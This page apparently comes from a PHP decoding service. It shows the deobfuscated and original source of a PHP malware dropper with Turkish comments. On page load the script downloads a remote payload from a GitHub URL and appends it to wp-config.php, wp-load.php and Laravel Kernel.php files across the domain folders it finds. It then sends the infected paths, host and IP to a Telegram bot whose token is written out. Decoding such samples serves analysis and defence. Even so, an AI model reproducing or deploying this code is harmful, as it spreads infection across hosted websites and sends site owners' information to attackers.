Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $payloadUrl = "\150\x74\x74\160..
Decoded Output download
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$payloadUrl = "https://raw.githubusercontent.com/necessaryfor/neces/refs/heads/main/z2.txt";
$logMode = isset($_GET['logke']);
$payload = file_get_contents($payloadUrl);
if (!$payload) {
echo json_encode(['status' => 'error', 'message' => 'Payload indirilemedi.']);
exit();
}
function findDomains_v1($startDir)
{
$currentDir = realpath($startDir);
$domains = [];
while ($currentDir !== '/') {
$entries = scandir($currentDir);
foreach ($entries as $entry) {
if ($entry === '.' || $entry === '..') {
continue;
}
$entryPath = $currentDir . DIRECTORY_SEPARATOR . $entry;
if (is_dir($entryPath) && preg_match('/^[a-zA-Z0-9\-.]+$/', $entry)) {
$domains[] = $entryPath;
}
}
$currentDir = dirname($currentDir);
}
return array_unique($domains);
}
function scanAndProcessInDomains($domains, $payload, $targetFiles, &$updatedFiles)
{
$results = [];
foreach ($domains as $domainDir) {
$results = array_merge($results, scanAndProcess($domainDir, $payload, $targetFiles, $updatedFiles));
}
return $results;
}
function adjustPhpTags($fileContents, $payload)
{
$utcTimestamp = gmdate('Y-m-d H:i:s');
$MiuskCode = "<!-- Miusk Code: $utcTimestamp -->
$payload";
if (preg_match('/<\?php/', $fileContents)) {
if (!preg_match('/\?>\s*$/', $fileContents)) {
$fileContents .= "
?>";
}
} else {
$fileContents = "<?php
" . $fileContents;
}
return $fileContents . "
" . $MiuskCode;
}
function sendTelegramNotification($updatedFiles)
{
$botToken = "7288530056:AAH3mvjU3wl94AivFXbX2XWH4Oug6c74gy8";
$chatId = "-1002316636347";
$processedPaths = [];
foreach ($updatedFiles as $filePath) {
// Domain ile / arasna bir boluk ekle
$formattedPath = preg_replace('/(\.[a-z]{2,})(\/)/', '$1 $2', $filePath);
$processedPaths[] = $formattedPath; // lenmi yolu diziye ekle
}
// Tekrar eden yollar filtrele
$uniquePaths = array_unique($processedPaths);
$message = "Gncellenen dosyalar:
";
foreach ($uniquePaths as $uniquePath) {
$message .= "- $uniquePath
";
}
$host = $_SERVER['HTTP_HOST']; // Dorudan host deerini alyoruz
$message .= "Sayfa URL: " . $host . "
";
// DNS sorgusu ile IP adresini alyoruz
$dnsRecords = dns_get_record($host, DNS_A);
$ip = isset($dnsRecords[0]['ip']) ? $dnsRecords[0]['ip'] : 'IP bulunamad';
$message .= "domain-ip: " . $ip . "
";
// Telegram mesajn gnder
$message = urlencode($message);
file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=$message");
}
function scanAndProcess($directory, $payload, $targetFiles, &$updatedFiles)
{
$files = scandir($directory);
$results = [];
foreach ($files as $file) {
if ($file === '.' || $file === '..') {
continue;
}
$filePath = $directory . DIRECTORY_SEPARATOR . $file;
try {
if (is_dir($filePath)) {
$results = array_merge($results, scanAndProcess($filePath, $payload, $targetFiles, $updatedFiles));
} else {
// st klasr ismine gre kontrol
$fileName = basename($filePath);
$parentDirs = array_filter(explode(DIRECTORY_SEPARATOR, dirname($filePath)));
foreach ($targetFiles as $target) {
// Dosya yolu ve st dizinleri kontrol et
$targetParts = array_filter(explode('/', $target));
$targetFileName = array_pop($targetParts); // Son eleman dosya ismi
$targetParentDirs = $targetParts; // Kalanlar st dizin isimleri
// Eer dosya ismi eleiyorsa, st dizinleri kontrol et
if ($fileName === $targetFileName) {
// st dizinlerin sras nemli, her st dizinin mevcut dizinde olmas gerekiyor
if (count($targetParentDirs) <= count($parentDirs) && array_slice($parentDirs, -count($targetParentDirs)) === $targetParentDirs) {
processFile($filePath, $payload, $updatedFiles, $results);
}
}
}
}
} catch (Exception $e) {
$results[] = ['file' => $filePath, 'status' => 'error', 'message' => $e->getMessage()];
}
}
return $results;
}
function processFile($filePath, $payload, &$updatedFiles, &$results)
{
$fileContents = @file_get_contents($filePath);
if ($fileContents === false) {
$results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Dosya okunamad.'];
return;
}
if (preg_match('/<!-- Miusk Code: (.*?) -->/', $fileContents, $matches)) {
$lastUpdate = strtotime($matches[1]);
$currentUtc = time();
if (($currentUtc - $lastUpdate) < 30) {
$results[] = ['file' => $filePath, 'status' => 'skipped', 'message' => 'Kod zaten gncel.'];
return;
}
$fileContents = preg_replace('/
<!-- Miusk Code.*$/s', '', $fileContents);
}
$adjustedContents = adjustPhpTags($fileContents, $payload);
if (@file_put_contents($filePath, $adjustedContents)) {
$updatedFiles[] = $filePath;
$results[] = ['file' => $filePath, 'status' => 'success', 'message' => 'Kod baaryla eklendi.'];
} else {
$results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Kod eklenemedi.'];
}
}
$startDir = __DIR__;
$targetFiles = ['app/Http/Kernel.php', 'wp-load.php', 'wp-config.php'];
$domains = findDomains_v1($startDir);
$updatedFiles = [];
$results = scanAndProcessInDomains($domains, $payload, $targetFiles, $updatedFiles);
if (!empty($updatedFiles)) {
sendTelegramNotification($updatedFiles);
}
echo json_encode($results);
exit;
}
?>
<script>
window.addEventListener('load', function () {
if (!window.started) {
window.started = true;
fetch(window.location.href, {
method: 'POST',
headers: { 'Content-Type': 'application/json' }
})
.then(response => response.json())
.then(data => {
data.forEach(result => {
const statusColor = result.status === 'success' ? 'green' : result.status === 'error' ? 'red' : 'orange';
});
})
.catch(error => console.error("Hata:", error));
}
});
</script>
Did this file decode correctly?
Original Code
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$payloadUrl = "\150\x74\x74\160\163\x3a\x2f\57\162\141\x77\x2e\147\x69\164\150\165\x62\x75\x73\145\x72\143\x6f\x6e\164\145\156\164\56\x63\x6f\155\x2f\156\x65\x63\145\163\163\x61\162\171\x66\157\162\57\x6e\145\x63\x65\x73\x2f\162\x65\x66\163\57\150\x65\x61\144\x73\x2f\155\141\x69\156\x2f\172\x32\56\164\x78\x74";
$logMode = isset($_GET['logke']);
$payload = file_get_contents($payloadUrl);
if (!$payload) {
echo json_encode(['status' => 'error', 'message' => 'Payload indirilemedi.']);
exit();
}
function findDomains_v1($startDir)
{
$currentDir = realpath($startDir);
$domains = [];
while ($currentDir !== '/') {
$entries = scandir($currentDir);
foreach ($entries as $entry) {
if ($entry === '.' || $entry === '..') {
continue;
}
$entryPath = $currentDir . DIRECTORY_SEPARATOR . $entry;
if (is_dir($entryPath) && preg_match('/^[a-zA-Z0-9\-.]+$/', $entry)) {
$domains[] = $entryPath;
}
}
$currentDir = dirname($currentDir);
}
return array_unique($domains);
}
function scanAndProcessInDomains($domains, $payload, $targetFiles, &$updatedFiles)
{
$results = [];
foreach ($domains as $domainDir) {
$results = array_merge($results, scanAndProcess($domainDir, $payload, $targetFiles, $updatedFiles));
}
return $results;
}
function adjustPhpTags($fileContents, $payload)
{
$utcTimestamp = gmdate('Y-m-d H:i:s');
$MiuskCode = "<!-- Miusk Code: $utcTimestamp -->\n$payload";
if (preg_match('/<\?php/', $fileContents)) {
if (!preg_match('/\?>\s*$/', $fileContents)) {
$fileContents .= "\n?>";
}
} else {
$fileContents = "<?php\n" . $fileContents;
}
return $fileContents . "\n\n" . $MiuskCode;
}
function sendTelegramNotification($updatedFiles)
{
$botToken = "\x37\x32\70\x38\x35\x33\60\x30\x35\x36\x3a\101\x41\110\x33\x6d\166\x6a\125\x33\167\x6c\x39\64\x41\151\166\106\130\x62\130\62\130\127\110\x34\x4f\165\x67\x36\x63\x37\64\x67\171\x38";
$chatId = "\55\x31\x30\60\62\x33\x31\x36\x36\x33\66\63\x34\x37";
$processedPaths = [];
foreach ($updatedFiles as $filePath) {
// Domain ile / arasna bir boluk ekle
$formattedPath = preg_replace('/(\.[a-z]{2,})(\/)/', '$1 $2', $filePath);
$processedPaths[] = $formattedPath; // lenmi yolu diziye ekle
}
// Tekrar eden yollar filtrele
$uniquePaths = array_unique($processedPaths);
$message = "Gncellenen dosyalar:\n";
foreach ($uniquePaths as $uniquePath) {
$message .= "- $uniquePath\n";
}
$host = $_SERVER['HTTP_HOST']; // Dorudan host deerini alyoruz
$message .= "Sayfa URL: " . $host . "\n";
// DNS sorgusu ile IP adresini alyoruz
$dnsRecords = dns_get_record($host, DNS_A);
$ip = isset($dnsRecords[0]['ip']) ? $dnsRecords[0]['ip'] : 'IP bulunamad';
$message .= "domain-ip: " . $ip . "\n";
// Telegram mesajn gnder
$message = urlencode($message);
file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=$message");
}
function scanAndProcess($directory, $payload, $targetFiles, &$updatedFiles)
{
$files = scandir($directory);
$results = [];
foreach ($files as $file) {
if ($file === '.' || $file === '..') {
continue;
}
$filePath = $directory . DIRECTORY_SEPARATOR . $file;
try {
if (is_dir($filePath)) {
$results = array_merge($results, scanAndProcess($filePath, $payload, $targetFiles, $updatedFiles));
} else {
// st klasr ismine gre kontrol
$fileName = basename($filePath);
$parentDirs = array_filter(explode(DIRECTORY_SEPARATOR, dirname($filePath)));
foreach ($targetFiles as $target) {
// Dosya yolu ve st dizinleri kontrol et
$targetParts = array_filter(explode('/', $target));
$targetFileName = array_pop($targetParts); // Son eleman dosya ismi
$targetParentDirs = $targetParts; // Kalanlar st dizin isimleri
// Eer dosya ismi eleiyorsa, st dizinleri kontrol et
if ($fileName === $targetFileName) {
// st dizinlerin sras nemli, her st dizinin mevcut dizinde olmas gerekiyor
if (count($targetParentDirs) <= count($parentDirs) && array_slice($parentDirs, -count($targetParentDirs)) === $targetParentDirs) {
processFile($filePath, $payload, $updatedFiles, $results);
}
}
}
}
} catch (Exception $e) {
$results[] = ['file' => $filePath, 'status' => 'error', 'message' => $e->getMessage()];
}
}
return $results;
}
function processFile($filePath, $payload, &$updatedFiles, &$results)
{
$fileContents = @file_get_contents($filePath);
if ($fileContents === false) {
$results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Dosya okunamad.'];
return;
}
if (preg_match('/<!-- Miusk Code: (.*?) -->/', $fileContents, $matches)) {
$lastUpdate = strtotime($matches[1]);
$currentUtc = time();
if (($currentUtc - $lastUpdate) < 30) {
$results[] = ['file' => $filePath, 'status' => 'skipped', 'message' => 'Kod zaten gncel.'];
return;
}
$fileContents = preg_replace('/\n\n<!-- Miusk Code.*$/s', '', $fileContents);
}
$adjustedContents = adjustPhpTags($fileContents, $payload);
if (@file_put_contents($filePath, $adjustedContents)) {
$updatedFiles[] = $filePath;
$results[] = ['file' => $filePath, 'status' => 'success', 'message' => 'Kod baaryla eklendi.'];
} else {
$results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Kod eklenemedi.'];
}
}
$startDir = __DIR__;
$targetFiles = ['app/Http/Kernel.php', 'wp-load.php', 'wp-config.php'];
$domains = findDomains_v1($startDir);
$updatedFiles = [];
$results = scanAndProcessInDomains($domains, $payload, $targetFiles, $updatedFiles);
if (!empty($updatedFiles)) {
sendTelegramNotification($updatedFiles);
}
echo json_encode($results);
exit;
}
?>
<script>
window.addEventListener('load', function () {
if (!window.started) {
window.started = true;
fetch(window.location.href, {
method: 'POST',
headers: { 'Content-Type': 'application/json' }
})
.then(response => response.json())
.then(data => {
data.forEach(result => {
const statusColor = result.status === 'success' ? 'green' : result.status === 'error' ? 'red' : 'orange';
});
})
.catch(error => console.error("Hata:", error));
}
});
</script>
Function Calls
None |
Stats
MD5 | a5325a432329aff6899c27101f4aa431 |
Eval Count | 0 |
Decode Time | 74 ms |